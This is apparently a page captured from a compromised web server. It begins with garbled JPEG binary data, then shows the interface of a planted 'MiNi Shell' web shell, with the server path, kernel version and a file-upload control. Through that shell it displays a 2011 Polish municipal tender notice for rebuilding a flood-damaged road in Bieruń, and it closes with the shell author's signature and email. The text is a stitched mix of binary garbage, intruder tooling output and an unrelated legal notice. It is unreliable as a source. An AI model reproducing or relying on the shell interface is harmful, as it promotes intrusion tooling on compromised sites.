JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110415/79126-N-2011.html

<p class="kh_header"><b>Bieruń: Odbudowa i modernizacja dróg gminnych zalanych 
i zniszczonych wodami powodziowymi w dzielnicy Kopań
 i Bijasowice w Bieruniu -ul. Bijasowicka</b><br>
<b>Numer ogłoszenia: 79126 - 2011; data zamieszczenia: 15.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa i modernizacja dróg gminnych zalanych 
i zniszczonych wodami powodziowymi w dzielnicy Kopań
 i Bijasowice w Bieruniu -ul. Bijasowicka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem   zamówienia jest :
Odbudowa i modernizacja drogi gminnej ul. Bijasowickiej (w stronę ul. Peryferyjnej)        o długości 560 m i szerokości 3,75 m.   Droga ta zastała uszkodzona podczas powodzi,  jaka dotknęła gminę Bieruń w maju 2010 roku.  
Zakres robót został określony  w przedmiarze robót  i specyfikacji technicznej wykonania         i odbioru robót  remontowych, i obejmuje  :
a/ Roboty rozbiórkowe nawierzchni z betonu asfaltowego - 7,5 m2    
 b/ Wykonanie warstwy wyrównawczej asfaltowej grub. 3 cm na pow. 2100 m2  
c/ Ułożenie warstwy wzmacniającej z geosiatki typu HaTelit C 40/70 lub równoważnego -     
2100	m2   
         d/ Wykonanie nawierzchni z mieszanek mineralno-bitumicznych asfaltowych w dwóch 
             warstwach 4+4 cm na pow. 2100 m 2 
         e/ Uzupełnienie poboczy tłuczniem kamiennym - 560 m2
         f/  Ręczne plantowanie poboczy  - 560 m2 
g/ Regulacja pionowa studzienek dla zaworów wodociągowych - 6 szt.
h/ Oznakowanie robót drogowych na czas wykonywania remontu.
    3.Warunki i wymagania :
a/ Przed przystąpieniem do robót wykonawca zobowiązany jest do zinwentaryzowania wszystkich urządzeń obcych występujących na terenie przewidzianym  pod prace remontowe. Wszystkie roboty prowadzone w pobliżu tych urządzeń należy prowadzić przy użyciu lekkiego sprzętu, aby nie doprowadzić do ich uszkodzenia.
b/ W trakcie realizacji modernizacji drogi należy : 
      - wznowić zniszczone w trakcie robót budowlanych znaki geodezyjne
      - w przypadku uszkodzenia urządzeń - wykonawca pokrywa koszty usunięcia awarii oraz 
        koszty poniesionych strat eksploatacyjnych;
  c/ Obowiązkiem wykonawcy jest zapewnienie kadry kierowniczej - kierownika budowy;
  d/ W kosztorysie ofertowym w kosztach pośrednich należy ująć koszty :
      - doprowadzenia terenu budowy po zakończeniu budowy do stanu pierwotnego;
      - wykonania projektu organizacji ruchu na czas prowadzenia robót budowlanych , 
        dostawy i wykonania oznakowania pasa drogowego;       
      - składowania materiałów rozbiórkowych;
   e/ Jeżeli w specyfikacji technicznej wykonania i odbioru robót oraz SIWZ określone zostały 
       materiały i urządzenia przy pomocy znaków towarowych, patentu lub pochodzenia, nie 
       oznacza to , że nie można zastosować materiałów i urządzeń równoważnych, lecz o nie  
       gorszych parametrach i spełniających wymogi podane w specyfikacji technicznej 
       wykonania i odbioru robót. Podane w opisach nazwy własne nie mają na celu narusze-  
       nie art.29 i art. 7 ustawy pzp, a mają jedynie za zadanie sprecyzowanie oczekiwań 
       jakościowych i technologicznych zamawiającego. Zamawiający dopuszcza rozwiązania 
       równoważne pod warunkiem spełnienia tego samego poziomu jakościowego, 
       technologicznego i estetycznego.
     f/Zastosowane materiały i wyroby muszą posiadać odpowiednie dokumenty opuszczające
                do stosowania w budownictwie, zgodnie z obowiązującym w tym  zakresie prawem.   
                
                 Wykonawcę zobowiązuje się do uzgadniania z zamawiającym użycie materiałów i 
                 wyrobów wpływających na poprawę estetyki i wyglądu remontowanych dróg.
Powyższe roboty objęte są podatkiem VAT w wysokości 23%.
Zamawiający nie przewiduje: zamówień uzupełniających, zaliczek na poczet wykonania zamówienia, aukcji elektronicznej, zawarcia umowy ramowej dynamicznego systemu zakupów w rozumieniu ustawy. 
Zamawiający zastrzega, że nie dopuszcza powierzenia całości zadania podwykonawcom .
Zamawiający nie dopuszcza składania ofert częściowych i wariantowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie stosuje się</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia / nie spełnia, na podstawie                                                                         
       przedłożonego przez wykonawcę : 
       - oświadczenia (zgodnie z art. 22 ust. 1 pkt 1 ustawy pzp).
       W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
       wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają wiedzę i doświadczenie : 
       Wykonali należycie  w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a  
       jeżeli okres prowadzonej działalności jest krótszy - to w tym okresie - roboty  remontowe lub 
       inwestycyjne w zakresie budowy , przebudowy, odbudowy lub remontu dróg o nawierzchniach 
       asfaltowych o łącznej wartości brutto min. 200 000 zł . 
       Ocena spełnienia warunku będzie dokonana wg zasady spełnia/nie spełnia, na podstawie 
       przedłożonego przez Wykonawcę:
 -   oświadczenia (zgodnie z art.22 ust.1 pkt 2 ustawy pzp)
-    dokumentów : wykazu wykonanych robót  remontowych lub inwestycyjnych  w zakresie  
     budowy, przebudowy, odbudowy lub remontu dróg o nawierzchniach asfaltowych,
     o łącznej wartości brutto min.  200 000 zł. oraz załączonych dokumentów (np. referencji)  
     potwierdzających, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej              i prawidłowo  ukończone .
Za wykonali zamawiający rozumie, że roboty  zostały zakończone i odebrane protokołami końcowymi odbioru robót w ostatnich pięciu latach przed upływem terminu składania ofert,           a jeżeli okres jest krótszy - w tym okresie.
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy   wykazać , że łącznie wykonali oni roboty o wartości brutto co najmniej 200 000 zł.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym do wykonania zamówienia.
Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp).
W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy wykazać, że warunek spełnia przynajmniej jeden z wykonawców.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednimi osobami zdolnymi do wykonania zamówienia:
       Dysponują co najmniej jedną osobą posiadającą uprawnienia bez ograniczeń do kierowania 
       robotami drogowymi, która będzie uczestniczyć w wykonaniu zamówienia.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie 
        przedłożonego przez wykonawcę:
- oświadczenia (zgodnie z art.22 ust.1 pkt 3 ustawy pzp)
        - dokumentu - wykazu osób, które będą uczestniczyć w wykonaniu zamówienia, 
          w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości , wraz 
          z informacjami na temat ich kwalifikacji zawodowych niezbędnych do wykonania 
          zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją 
          o podstawie do dysponowania tymi osobami.   
 W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy   
 wykazać, że warunek spełnia przynajmniej jeden z wykonawców</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej zrealizowanie zamówienia:.
       Ocena spełnienia warunku będzie dokonana wg zasady: spełnia/ nie spełnia, na podstawie          
        przedłożonego przez wykonawcę :
        - oświadczenia (zgodnie z art.22 ust.1 pkt 4 ustawy pzp).
  W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia należy  
        wykazać, że warunek spełnia przynajmniej jeden z wykonawców</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.Oferta jest jawna w całości / części. Strony oferty od ....     do .....    stanowią tajemnicę       przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej konkurencji i nie mogą być ujawnione innym uczestnikom postępowania.
     W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego w tym zakresie, zamawiający uzna, że oferta wykonawcy jest jawna w całości.
   2. Oświadczenie, czy część zamówienia zostanie powierzona podwykonawcom. 
           W przypadku braku złożenia oświadczenia lub braku wypełnienia formularza ofertowego 
           w tym zakresie, zamawiający uzna, że wykonawca wykona całość zamówienia sam bez 
           powierzenia części zamówienia podwykonawcom.
3. Oświadczenie podmiotów występujących wspólnie (konsorcjum, spółka cywilna) -
    w przypadku ich udziału w postępowaniu.
4. Oświadczenie osoby/ osób podpisujących ofertę, że jest / są uprawniona/-e do zaciągania
    zobowiązań i składania oświadczeń w imieniu wykonawcy.
5. Oświadczenie o zapoznaniu się z treścią SIWZ i jej akceptacji.
       6. Oświadczenie o  związaniu ofertą  przez okres 30 dni od daty upływu terminu składania 
            ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany zawartej z Wykonawcą umowy w zakresie:
a.  wartości umownej, w przypadku wprowadzenia zmian VAT, który będzie naliczany  
     zgodnie z obowiązującą stawką; 
b.  zmiany osób, które będą uczestniczyć w wykonywaniu przedmiotu umowy                       
     z zachowaniem wymagań określonych w SIWZ;, jakie osoby te powinny spełniać; 
            c. terminu realizacji i jego poszczególnych etapów, w szczególności spowodowane: 
                długotrwałymi opadami deszczu lub innymi warunkami atmosferycznymi, 
                uniemożliwiającymi realizację przedmiotu zamówienia;
d. mającym wpływ na realizację przedmiotu umowy, w przypadku gdy nastąpi zmiana 
    powszechnie obowiązujących przepisów prawa; 
e. innych zmian, których nie można było przewidzieć na etapie sporządzania SIWZ, 
    a które nie wykraczają poza zakres art. 140 ustawy Prawo zamówień publicznych .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Bieruniu - Referat Zamówień Publicznych
43-150 Bieruń, ul. Rynek 14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.05.2011 godzina 12:30, miejsce: Urząd Miejski w Bieruniu - kancelaria (parter)
43-150 Bieruń, ul. Rynek1 4.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com